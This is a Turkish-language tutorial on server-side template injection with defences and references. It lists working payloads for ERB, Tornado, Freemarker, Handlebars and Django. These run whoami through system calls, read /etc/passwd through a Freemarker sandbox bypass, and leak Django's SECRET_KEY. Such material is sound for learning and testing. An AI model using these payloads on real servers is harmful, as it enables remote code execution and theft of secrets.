SSTI

SSTI Nedir?

• Server side template injection, bir saldırganın native template syntax kullanarak bir şablona kötü amaçlı bir payload enjekte edebilmesi ve bunun sunucu tarafında çalıştırılmasıdır.

• Template engine'ler sabit şablonları geçici verilerle birleştirerek web sayfaları oluşturmak üzere tasarlanmıştır.

• Server side template injection saldırıları, kullanıcı girdisi veri olarak aktarılmak yerine doğrudan bir şablonda birleştirildiğinde ortaya çıkabilir.

• Bu, saldırganların template engine'i manipüle etmek için keyfi template direktifleri enjekte etmelerine ve genellikle sunucunun kontrolünü tamamen ele geçirmelerine olanak tanır.

• Adından da anlaşılacağı üzere, server-side template injection yükleri server-side olarak gönderilir ve değerlendirilir, bu da onları tipik bir client-side template injection'dan çok daha tehlikeli hale getirir.

Yöntemler

Error Mesajları

Aşağıdaki karakterler ile template engine hatası görmeyi deneyebiliriz.

${{<%[%'"}}%\

ERB Template Engine (Ruby)

<%= 7*7 %>
<%= system("whoami") %>

Tornado Template Engine (Python)

{{7*7}}

{% import os %}{{os.system('whoami')

Freemarker Template Engine (Java)

${7*7}
<#assign ex="freemarker.template.utility.Execute"?new()> ${ ex("whoami") }

Sandbox Bypass

${object.getClass()}
${product.getClass().getProtectionDomain().getCodeSource().getLocation().toURI().resolve('/etc/passwd').toURL().openStream().readAllBytes()?join(" ")}

Handlebars Template Engine (Javascript)

wrtz{{#with "s" as |string|}}
    {{#with "e"}}
        {{#with split as |conslist|}}
            {{this.pop}}
            {{this.push (lookup string.sub "constructor")}}
            {{this.pop}}
            {{#with string.split as |codelist|}}
                {{this.pop}}
                {{this.push "return require('child_process').exec('whoami');"}}
                {{this.pop}}
                {{#each conslist}}
                    {{#with (string.sub.apply 0 codelist)}}
                        {{this}}
                    {{/with}}
                {{/each}}
            {{/with}}
        {{/with}}
    {{/with}}
{{/with}}

Django Template Engine (Python)

{% debug %}
{{settings.SECRET_KEY}}

Önlemler

• Sunucu tarafı şablon enjeksiyonunu önlemenin en iyi yolu, hiçbir kullanıcının yeni şablonları değiştirmesine veya göndermesine izin vermemektir. Ancak, iş gereksinimleri nedeniyle bu bazen kaçınılmaz olabilir.

• Sunucu tarafı şablon enjeksiyonu güvenlik açıklarını önlemenin en basit yollarından biri, kesinlikle gerekli olmadıkça her zaman Mustache gibi "logic-less" bir şablon motoru kullanmaktır. Mantığı sunumdan mümkün olduğunca ayırmak, en tehlikeli şablon tabanlı saldırılara maruz kalmanızı büyük ölçüde azaltabilir.

• Bir başka önlem de kullanıcıların kodlarını yalnızca potansiyel olarak tehlikeli modüllerin ve işlevlerin tamamen kaldırıldığı korumalı bir ortamda çalıştırmaktır. Ne yazık ki, güvenilmeyen kodu korumalı alana almak doğası gereği zordur ve bypass edilmeye yatkındır.

• Son olarak, bir başka tamamlayıcı yaklaşım da keyfi kod çalıştırmanın kaçınılmaz olduğunu kabul etmek ve şablon ortamınızı örneğin kilitli bir Docker konteynerinde dağıtarak kendi korumalı alanınızı uygulamaktır.

Araçlar

SSTIMAP: https://github.com/vladko312/SSTImap

Kaynaklar

Portswigger Academy: https://portswigger.net/web-security/server-side-template-injection

Hacktricks: https://book.hacktricks.xyz/pentesting-web/ssti-server-side-template-injection